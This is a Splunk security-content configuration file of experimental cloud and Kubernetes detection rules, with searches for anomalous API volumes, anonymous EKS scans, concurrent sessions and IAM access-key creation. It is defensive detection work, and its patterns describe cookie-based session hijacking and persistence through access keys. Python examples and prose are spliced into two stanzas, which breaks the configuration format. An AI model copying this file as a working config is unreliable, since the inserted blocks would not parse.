action.correlationsearch.annotations = {"analytic_story": ["Suspicious Cloud User Activities", "Compromised User Account"], "cis20": ["CIS 13"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.004", "T1078"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats count as api_calls values(All_Changes.command) as command from datamodel=Change where All_Changes.user!=unknown All_Changes.status=success by All_Changes.user _time span=1h | `drop_dm_object_name("All_Changes")` | eval HourOfDay=strftime(_time, "%H") | eval HourOfDay=floor(HourOfDay/4)*4 | eval DayOfWeek=strftime(_time, "%w") | eval isWeekend=if(DayOfWeek >= 1 AND DayOfWeek <= 5, 0, 1) | join user HourOfDay isWeekend [ summary cloud_excessive_api_calls_v1] | where cardinality >=16 | apply cloud_excessive_api_calls_v1 threshold=0.005 | rename "IsOutlier(api_calls)" as isOutlier | where isOutlier=1 | eval expected_upper_threshold = mvindex(split(mvindex(BoundaryRanges, -1), ":"), 0) | where api_calls > expected_upper_threshold | eval distance_from_threshold = api_calls - expected_upper_threshold | table _time, user, command, api_calls, expected_upper_threshold, distance_from_threshold | `abnormally_high_number_of_cloud_infrastructure_api_calls_filter`

[ESCU - Abnormally High Number Of Cloud Instances Destroyed - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search finds the number of successfully destroyed cloud instances for every 4-hour block. This is split up between weekdays and the weekend. It then applies the probability density model previously created and alerts on any outliers.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.004", "T1078"], "nist": ["DE.AE"]}
action.escu.data_models = ["Change"]
action.escu.eli5 = This search finds the number of successfully destroyed cloud instances for every 4-hour block. This is split up between weekdays and the weekend. It then applies the probability density model previously created and alerts on any outliers.
action.escu.how_to_implement = You must be ingesting your cloud infrastructure logs. You also must run the baseline search `Baseline Of Cloud Instances Destroyed` to create the probability density function.
action.escu.known_false_positives = Many service accounts configured within a cloud infrastructure are known to exhibit this behavior. Please adjust the threshold values and filter out service accounts from the output. Always verify if this search alerted on a human user.
action.escu.creation_date = 2020-08-21
action.escu.modification_date = 2020-08-21
action.escu.confidence = high
action.escu.full_search_name = ESCU - Abnormally High Number Of Cloud Instances Destroyed - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Suspicious Cloud Instance Activities"]
action.risk = 1
action.risk.param._risk_message = tbd
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Experimental - Abnormally High Number Of Cloud Instances Destroyed - Rule
action.correlationsearch.annotations = {"analytic_story": ["Suspicious Cloud Instance Activities"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.004", "T1078"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats count as instances_destroyed values(All_Changes.object_id) as object_id from datamodel=Change where All_Changes.action=deleted AND All_Changes.status=success AND All_Changes.object_category=instance by All_Changes.user _time span=1h | `drop_dm_object_name("All_Changes")` | eval HourOfDay=strftime(_time, "%H") | eval HourOfDay=floor(HourOfDay/4)*4 | eval DayOfWeek=strftime(_time, "%w") | eval isWeekend=if(DayOfWeek >= 1 AND DayOfWeek <= 5, 0, 1) | join HourOfDay isWeekend [summary cloud_excessive_instances_destroyed_v1] | where cardinality >=16 | apply cloud_excessive_instances_destroyed_v1 threshold=0.005 | rename "IsOutlier(instances_destroyed)" as isOutlier | where isOutlier=1 | eval expected_upper_threshold = mvindex(split(mvindex(BoundaryRanges, -1), ":"), 0) | eval distance_from_threshold = instances_destroyed - expected_upper_threshold | table _time, user, instances_destroyed, expected_upper_threshold, distance_from_threshold, object_id | `abnormally_high_number_of_cloud_instances_destroyed_filter`

[ESCU - Abnormally High Number Of Cloud Instances Launched - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search finds the number of successfully created cloud instances for every 4-hour block. This is split up between weekdays and the weekend. It then applies the probability density model previously created and alerts on any outliers.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.004", "T1078"], "nist": ["DE.AE"]}
action.escu.data_models = ["Change"]
action.escu.eli5 = This search finds the number of successfully created cloud instances for every 4-hour block. This is split up between weekdays and the weekend. It then applies the probability density model previously created and alerts on any outliers.
action.escu.how_to_implement = You must be ingesting your cloud infrastructure logs. You also must run the baseline search `Baseline Of Cloud Instances Launched` to create the probability density function.
action.escu.known_false_positives = Many service accounts configured within an AWS infrastructure are known to exhibit this behavior. Please adjust the threshold values and filter out service accounts from the output. Always verify if this search alerted on a human user.
action.escu.creation_date = 2020-08-21
action.escu.modification_date = 2020-08-21
action.escu.confidence = high
action.escu.full_search_name = ESCU - Abnormally High Number Of Cloud Instances Launched - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Cloud Cryptomining", "Suspicious Cloud Instance Activities"]
action.risk = 1
action.risk.param._risk_message = tbd
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Experimental - Abnormally High Number Of Cloud Instances Launched - Rule
action.correlationsearch.annotations = {"analytic_story": ["Cloud Cryptomining", "Suspicious Cloud Instance Activities"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.004", "T1078"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats count as instances_launched values(All_Changes.object_id) as object_id from datamodel=Change where (All_Changes.action=created) AND All_Changes.status=success AND All_Changes.object_category=instance by All_Changes.user _time span=1h | `drop_dm_object_name("All_Changes")` | eval HourOfDay=strftime(_time, "%H") | eval HourOfDay=floor(HourOfDay/4)*4 | eval DayOfWeek=strftime(_time, "%w") | eval isWeekend=if(DayOfWeek >= 1 AND DayOfWeek <= 5, 0, 1) | join HourOfDay isWeekend [summary cloud_excessive_instances_created_v1] | where cardinality >=16 | apply cloud_excessive_instances_created_v1 threshold=0.005 | rename "IsOutlier(instances_launched)" as isOutlier | where isOutlier=1 | eval expected_upper_threshold = mvindex(split(mvindex(BoundaryRanges, -1), ":"), 0) | eval distance_from_threshold = instances_launched - expected_upper_threshold | table _time, user, instances_launched, expected_upper_threshold, distance_from_threshold, object_id | `abnormally_high_number_of_cloud_instances_launched_filter`

[ESCU - Abnormally High Number Of Cloud Security Group API Calls - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search will detect a spike in the number of API calls made to your cloud infrastructure environment about security groups by a user.
action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.004", "T1078"], "nist": ["DE.AE"]}
action.escu.data_models = ["Change"]
action.escu.eli5 = This search will detect a spike in the number of API calls made to your cloud infrastructure environment about security groups by a user.
action.escu.how_to_implement = You must be ingesting your cloud infrastructure logs. You also must run the baseline search `Baseline Of Cloud Security Group API Calls Per User` to create the probability density function model.
action.escu.known_false_positives = 
action.escu.creation_date = 2020-09-07
action.escu.modification_date = 2020-09-07
action.escu.confidence = high
action.escu.full_search_name = ESCU - Abnormally High Number Of Cloud Security Group API Calls - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Suspicious Cloud User Activities"]
action.risk = 1
action.risk.param._risk_message = user $user$ has made $api_calls$ api calls related to security groups, violating the dynamic threshold of $expected_upper_threshold$ with the following command $command$.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 15}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Experimental - Abnormally High Number Of Cloud Security Group API Calls - Rule
action.correlationsearch.annotations = {"analytic_story": ["Suspicious Cloud User Activities"], "cis20": ["CIS 13"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.004", "T1078"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats count as security_group_api_calls values(All_Changes.command) as command from datamodel=Change where All_Changes.object_category=firewall AND All_Changes.status=success by All_Changes.user _time span=1h | `drop_dm_object_name("All_Changes")` | eval HourOfDay=strftime(_time, "%H") | eval HourOfDay=floor(HourOfDay/4)*4 | eval DayOfWeek=strftime(_time, "%w") | eval isWeekend=if(DayOfWeek >= 1 AND DayOfWeek <= 5, 0, 1) | join user HourOfDay isWeekend [ summary cloud_excessive_security_group_api_calls_v1] | where cardinality >=16 | apply cloud_excessive_security_group_api_calls_v1 threshold=0.005 | rename "IsOutlier(security_group_api_calls)" as isOutlier | where isOutlier=1 | eval expected_upper_threshold = mvindex(split(mvindex(BoundaryRanges, -1), ":"), 0) | where security_group_api_calls > expected_upper_threshold | eval distance_from_threshold = security_group_api_calls - expected_upper_threshold | table _time, user, command, security_group_api_calls, expected_upper_threshold, distance_from_threshold | `abnormally_high_number_of_cloud_security_group_api_calls_filter`

[ESCU - Amazon EKS Kubernetes cluster scan detection - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search provides information on unauthenticated requests, by user agent, and authentication data against a Kubernetes cluster in AWS.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1526"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This search provides information on unauthenticated requests, by user agent, and authentication data against a Kubernetes cluster in AWS.
action.escu.how_to_implement = You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your CloudWatch EKS Logs inputs.
action.escu.known_false_positives = Not all unauthenticated requests are malicious, but frequency, UA and source IPs will provide context.
action.escu.creation_date = 2020-04-15
action.escu.modification_date = 2020-04-15
action.escu.confidence = high
action.escu.full_search_name = ESCU - Amazon EKS Kubernetes cluster scan detection - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Kubernetes Scanning Activity"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Experimental - Amazon EKS Kubernetes cluster scan detection - Rule
action.correlationsearch.annotations = {"analytic_story": ["Kubernetes Scanning Activity"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1526"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `aws_cloudwatchlogs_eks` "user.username"="system:anonymous" userAgent!="AWS Security Scanner" | rename sourceIPs{} as src_ip | stats count min(_time) as firstTime max(_time) as lastTime values(responseStatus.reason) values(source) as cluster_name values(responseStatus.code) values(userAgent) as http_user_agent values(verb) values(requestURI) by src_ip user.username user.groups{} | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `amazon_eks_kubernetes_cluster_scan_detection_filter`

[ESCU - Amazon EKS Kubernetes Pod scan detection - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. The following analytic detects unauthenticated requests made against the Kubernetes' Pods API through proactive monitoring to protect the Kubernetes environment from unauthorized access and potential security breaches. The detection is made by using the Splunk query `aws_cloudwatchlogs_eks` with specific filters to identify these requests. It identifies events where the `user.username` is set to "system:anonymous", the `verb` is set to "list", and the `objectRef.resource` is set to "pods". Additionally, the search checks if the `requestURI` is equal to "/api/v1/pods". Analyzing these events helps you to identify any unauthorized access attempts to the Kubernetes' Pods API. Unauthenticated requests can indicate potential security breaches or unauthorized access to sensitive resources within the Kubernetes environment. The detection is important because unauthorized access to Kubernetes' Pods API can lead to the compromise of sensitive data, unauthorized execution of commands, or even the potential for lateral movement within the Kubernetes cluster. False positives might occur since there might be legitimate use cases for unauthenticated requests in certain scenarios. Therefore, you must review and validate any detected events before taking any action. Next steps include investigating the incident to mitigate any ongoing threats, and strengthening the security measures to prevent future unauthorized access attempts.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1526"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic detects unauthenticated requests made against the Kubernetes Pods API, as part of proactive monitoring to protect the Kubernetes environment from unauthorized access and potential security breaches. The detection uses the `aws_cloudwatchlogs_eks` macro with specific filters to identify these requests. It identifies events where `user.username` is set to "system:anonymous", `verb` is set to "list", and `objectRef.resource` is set to "pods". Additionally, the search checks that `requestURI` is equal to "/api/v1/pods". Analyzing these events helps you identify unauthorized access attempts to the Kubernetes Pods API. Unauthenticated requests can indicate potential security breaches or unauthorized access to sensitive resources within the Kubernetes environment. The detection is important because unauthorized access to the Kubernetes Pods API can lead to the compromise of sensitive data, unauthorized execution of commands, or even lateral movement within the Kubernetes cluster. False positives might occur, since there might be legitimate use cases for unauthenticated requests in certain scenarios. Therefore, you must review and validate any detected events before taking any action. Next steps include investigating the incident to mitigate any ongoing threats and strengthening security measures to prevent future unauthorized access attempts.
action.escu.how_to_implement = You must install the AWS App for Splunk (version 5.1.0 or later) and the Splunk Add-on for AWS (version 4.4.0 or later), then configure your AWS CloudWatch EKS logs. Please also customize the `kubernetes_pods_aws_scan_fingerprint_detection` macro to filter out the false positives.
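The anonymous-request filters of the cluster scan and Pod scan searches in these two stanzas, re-implemented as an added example (not Splunk's code) over constructed Kubernetes audit records; it also shows how the Pod scan search's exact `requestURI` comparison treats a request that carries a query string:

```python
"""Anonymous-request detection over EKS control-plane audit events.

Added example (not Splunk's code): re-implements, in plain Python, the filters of
the "Amazon EKS Kubernetes cluster scan detection" and "Pod scan detection"
searches over constructed Kubernetes audit records, so both conditions can be
exercised without Splunk. Field names follow the Kubernetes audit event schema
that EKS ships to CloudWatch Logs; the sample events, cluster name and IPs are
constructed.
"""
from datetime import datetime

ANONYMOUS = "system:anonymous"
AWS_SCANNER_UA = "AWS Security Scanner"   # excluded by the cluster-scan search


def is_cluster_scan(ev):
    """Cluster-scan search: any anonymous request not sent by AWS's own scanner."""
    return (ev.get("user", {}).get("username") == ANONYMOUS
            and ev.get("userAgent") != AWS_SCANNER_UA)


def is_pod_scan(ev):
    """Pod-scan search: anonymous 'list pods' whose requestURI is exactly /api/v1/pods."""
    return (ev.get("user", {}).get("username") == ANONYMOUS
            and ev.get("verb") == "list"
            and ev.get("objectRef", {}).get("resource") == "pods"
            and ev.get("requestURI") == "/api/v1/pods")


def _ts(ev):
    return datetime.fromisoformat(ev["stageTimestamp"].replace("Z", "+00:00"))


def aggregate(events, predicate):
    """Python equivalent of `stats count min(_time) max(_time) values(...)
    by src_ip cluster_name user.username user.groups{}` over matching events."""
    out = {}
    for ev in events:
        if not predicate(ev):
            continue
        groups = tuple(ev["user"].get("groups", []))
        for src_ip in ev.get("sourceIPs", []):          # rename sourceIPs{} as src_ip
            key = (src_ip, ev["cluster_name"], ev["user"]["username"], groups)
            s = out.setdefault(key, {"count": 0, "firstTime": None, "lastTime": None,
                                     "codes": set(), "reasons": set(),
                                     "user_agents": set(), "verbs": set(), "uris": set()})
            t = _ts(ev)
            s["count"] += 1
            s["firstTime"] = t if s["firstTime"] is None else min(s["firstTime"], t)
            s["lastTime"] = t if s["lastTime"] is None else max(s["lastTime"], t)
            s["codes"].add(ev["responseStatus"]["code"])
            if "reason" in ev["responseStatus"]:
                s["reasons"].add(ev["responseStatus"]["reason"])
            s["user_agents"].add(ev.get("userAgent", ""))
            s["verbs"].add(ev["verb"])
            s["uris"].add(ev["requestURI"])
    return out


def _event(cluster, ip, ua, verb, uri, code, reason=None, resource=None,
           username=ANONYMOUS, groups=("system:unauthenticated",),
           ts="2024-04-17T21:00:00Z"):
    """Constructed audit record in the shape EKS writes to CloudWatch Logs."""
    status = {"code": code, **({"reason": reason} if reason else {})}
    return {"cluster_name": cluster, "sourceIPs": [ip], "userAgent": ua, "verb": verb,
            "objectRef": {"resource": resource} if resource else {},
            "requestURI": uri, "user": {"username": username, "groups": list(groups)},
            "responseStatus": status, "stageTimestamp": ts}


# Constructed sample: an anonymous pod listing, the same with a query string, AWS's
# own scanner, and an authenticated administrator doing the same listing.
SAMPLE_EVENTS = [
    _event("prod-eks", "198.51.100.7", "python-requests/2.31", "list", "/api/v1/pods",
           403, "Forbidden", resource="pods", ts="2024-04-17T21:00:00Z"),
    _event("prod-eks", "198.51.100.7", "python-requests/2.31", "list",
           "/api/v1/pods?limit=500", 403, "Forbidden", resource="pods",
           ts="2024-04-17T21:00:05Z"),
    _event("prod-eks", "203.0.113.9", AWS_SCANNER_UA, "get", "/version", 200),
    _event("prod-eks", "10.0.2.15", "kubectl/v1.29", "list", "/api/v1/pods", 200,
           resource="pods", username="kubernetes-admin", groups=("system:masters",)),
]


def detect(events=SAMPLE_EVENTS):
    """Run both searches; returns (pod_scan_hits, cluster_scan_hits)."""
    return aggregate(events, is_pod_scan), aggregate(events, is_cluster_scan)


if __name__ == "__main__":
    for label, hits in zip(("pod scan", "cluster scan"), detect()):
        for (ip, cluster, user, groups), s in hits.items():
            print(f"[{label}] {ip} -> {cluster} as {user} {list(groups)}: "
                  f"{s['count']} event(s), uris={sorted(s['uris'])}, codes={sorted(s['codes'])}")
```

The `?limit=500` variant is counted by the cluster-scan filter but not by the Pod scan filter, which is the practical difference between the two searches' matching conditions.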
action.escu.known_false_positives = Not all unauthenticated requests are malicious, but request frequency, user agent, source IPs and direct requests to the API provide context.
action.escu.creation_date = 2020-04-15
action.escu.modification_date = 2020-04-15
action.escu.confidence = high
action.escu.full_search_name = ESCU - Amazon EKS Kubernetes Pod scan detection - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Kubernetes Scanning Activity"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Experimental - Amazon EKS Kubernetes Pod scan detection - Rule
action.correlationsearch.annotations = {"analytic_story": ["Kubernetes Scanning Activity"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1526"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `aws_cloudwatchlogs_eks` "user.username"="system:anonymous" verb=list objectRef.resource=pods requestURI="/api/v1/pods" | rename source as cluster_name sourceIPs{} as src_ip | stats count min(_time) as firstTime max(_time) as lastTime values(responseStatus.reason) values(responseStatus.code) values(userAgent) values(verb) values(requestURI) by src_ip cluster_name user.username user.groups{} | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `amazon_eks_kubernetes_pod_scan_detection_filter`

[ESCU - ASL AWS Concurrent Sessions From Different Ips - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. The following analytic identifies an AWS IAM account with concurrent sessions coming from more than one unique IP address within the span of 5 minutes. This behavior could represent a session hijacking attack whereby an adversary has extracted cookies from a victim's browser and is using them from a different location to access corporate online resources. When a user navigates the AWS Console after authentication, the API call with the event name `DescribeEventAggregates` is registered in the AWS CloudTrail logs. The Splunk Threat Research team leveraged this event name to identify 2 concurrent sessions. The presence of this event occurring from two different IP addresses is highly unlikely. As users may behave differently across organizations, security teams should test and customize this detection to fit their environments.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1185"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic identifies an AWS IAM account with concurrent sessions coming from more than one unique IP address within the span of 5 minutes. This behavior could represent a session hijacking attack whereby an adversary has extracted cookies from a victim's browser and is using them from a different location to access corporate online resources. When a user navigates the AWS Console after authentication, the API call with the event name `DescribeEventAggregates` is registered in the AWS CloudTrail logs. The Splunk Threat Research team leveraged this event name to identify 2 concurrent sessions. The presence of this event occurring from two different IP addresses is highly unlikely. As users may behave differently across organizations, security teams should test and customize this detection to fit their environments.
action.escu.how_to_implement = You must install the Splunk Add-on for AWS v7.0.0 (https://splunkbase.splunk.com/app/1876), which includes a merge of all the capabilities of the Splunk Add-on for Amazon Security Lake. This search works with Amazon Security Lake logs, which are parsed in the Open Cybersecurity Schema Framework (OCSF) format.
action.escu.known_false_positives = A user with concurrent sessions from different IPs may also represent the legitimate use of more than one device. Filter as needed and/or customize the threshold to fit your environment.
action.escu.creation_date = 2023-05-23
action.escu.modification_date = 2023-05-23
action.escu.confidence = high
action.escu.full_search_name = ESCU - ASL AWS Concurrent Sessions From Different Ips - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Amazon Security Lake"]
action.escu.analytic_story = ["Compromised User Account", "AWS Identity and Access Management Account Takeover"]
action.risk = 1
action.risk.param._risk_message = User $identity.user.name$ has concurrent sessions from more than one unique IP address $src_endpoint.ip$ in the span of 5 minutes.
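The 5-minute binning and distinct-IP test described in this stanza, re-implemented as an added example (not Splunk's code) over constructed OCSF-shaped records; it also shows why two IPs that straddle a bin boundary are not flagged, which is the case the "customize the threshold" note is about:

```python
"""Concurrent AWS Console sessions from more than one IP within a 5-minute bin.

Added example (not Splunk's code): re-implements the "ASL AWS Concurrent Sessions
From Different Ips" search in Python over constructed OCSF-shaped records, to show
how `bin span=5m _time`, the "AWS Internal" exclusion and `dc(src_endpoint.ip) > 1`
interact. Record layout follows the dotted field names the search reads; times,
user names, credential ids and IPs are constructed.
"""
from collections import defaultdict

SPAN_SECONDS = 5 * 60          # bin span=5m _time
HEARTBEAT_OP = "DescribeEventAggregates"


def field(rec, dotted, default=None):
    """Fetch a nested value by OCSF dotted path, e.g. 'src_endpoint.ip'."""
    cur = rec
    for part in dotted.split("."):
        if not isinstance(cur, dict) or part not in cur:
            return default
        cur = cur[part]
    return cur


def concurrent_sessions(records, span=SPAN_SECONDS, threshold=1):
    """Return [(bin_start_epoch, credential_uid, user_name, sorted_ips)] for each
    (bin, credential) whose console heartbeat calls came from more than `threshold` IPs."""
    ips_by_key = defaultdict(set)
    for rec in records:
        if field(rec, "api.operation") != HEARTBEAT_OP:
            continue
        if field(rec, "src_endpoint.domain") == "AWS Internal":   # service-side calls
            continue
        bin_start = (field(rec, "time") // 1000) // span * span     # OCSF time is epoch ms
        key = (bin_start, field(rec, "identity.user.credential_uid"),
               field(rec, "identity.user.name"))
        ips_by_key[key].add(field(rec, "src_endpoint.ip"))
    return [(b, cred, name, sorted(ips))
            for (b, cred, name), ips in sorted(ips_by_key.items())
            if len(ips) > threshold]


def _rec(t_ms, name, cred, ip, op=HEARTBEAT_OP, domain=None):
    """Constructed OCSF API Activity record with only the fields the search reads."""
    endpoint = {"ip": ip}
    if domain:
        endpoint["domain"] = domain
    return {"time": t_ms, "api": {"operation": op}, "src_endpoint": endpoint,
            "identity": {"user": {"name": name, "credential_uid": cred}}}


T0 = 1713387600000   # 2024-04-17T21:00:00Z in epoch ms, on a 5-minute boundary
SAMPLE = [
    # alice: heartbeat from the office, then from a second IP 90 s later -> flagged
    _rec(T0 + 30_000, "alice", "ASIAEXAMPLE1", "198.51.100.7"),
    _rec(T0 + 120_000, "alice", "ASIAEXAMPLE1", "203.0.113.44"),
    # bob: two IPs, but at 21:04 and 21:06, i.e. in different 5-minute bins -> not flagged
    _rec(T0 + 240_000, "bob", "ASIAEXAMPLE2", "198.51.100.8"),
    _rec(T0 + 360_000, "bob", "ASIAEXAMPLE2", "203.0.113.45"),
    # carol: the second IP is an AWS-internal call, which the search excludes
    _rec(T0 + 60_000, "carol", "ASIAEXAMPLE3", "198.51.100.9"),
    _rec(T0 + 90_000, "carol", "ASIAEXAMPLE3", "203.0.113.46", domain="AWS Internal"),
    # dave: a different API operation is never considered
    _rec(T0 + 10_000, "dave", "ASIAEXAMPLE4", "198.51.100.10", op="ListBuckets"),
    _rec(T0 + 20_000, "dave", "ASIAEXAMPLE4", "203.0.113.47", op="ListBuckets"),
]


if __name__ == "__main__":
    for bin_start, cred, name, ips in concurrent_sessions(SAMPLE):
        print(f"bin {bin_start}: {name} ({cred}) seen from {len(ips)} IPs: {', '.join(ips)}")
```

Widening `span` to 600 seconds makes bob's two IPs land in one bin and flags him as well, which is the trade-off to weigh when tuning the window for your environment.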
action.risk.param._risk = [{"risk_object_field": "identity.user.credential_uid", "risk_object_type": "user", "risk_score": 42}, {"threat_object_field": "src_endpoint.ip", "threat_object_type": "ip_address"}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Experimental - ASL AWS Concurrent Sessions From Different Ips - Rule
action.correlationsearch.annotations = {"analytic_story": ["Compromised User Account", "AWS Identity and Access Management Account Takeover"], "cis20": ["CIS 10"], "confidence": 60, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1185"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `amazon_security_lake` api.operation=DescribeEventAggregates src_endpoint.domain!="AWS Internal" | bin span=5m _time | stats values(src_endpoint.ip) as src_endpoint.ip dc(src_endpoint.ip) as distinct_ip_count by _time identity.user.credential_uid identity.user.name | where distinct_ip_count > 1 | `aws_concurrent_sessions_from_different_ips_filter`

[ESCU - ASL AWS CreateAccessKey - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This detection rule monitors for the creation of AWS Identity and Access Management (IAM) access keys. An IAM access key consists of an access key ID and a secret access key, which are used to sign programmatic requests to AWS services. While IAM access keys can be legitimately used by developers and administrators for API access, their creation can also be indicative of malicious activity. Attackers who have gained unauthorized access to an AWS environment might create access keys as a means to establish persistence or to exfiltrate data through the APIs. Moreover, because access keys can be used to authenticate with AWS services without the need for further interaction, they can be particularly appealing for bad actors looking to operate under the radar. Consequently, it's important to vigilantly monitor and scrutinize access key creation events, especially if they are associated with unusual activity or are created by users who don't typically perform these actions. This hunting query identifies when a potentially compromised user creates an IAM access key for another user who may have higher privileges, which can be a sign of privilege escalation. Hunting queries are designed to be executed manually during threat hunting.
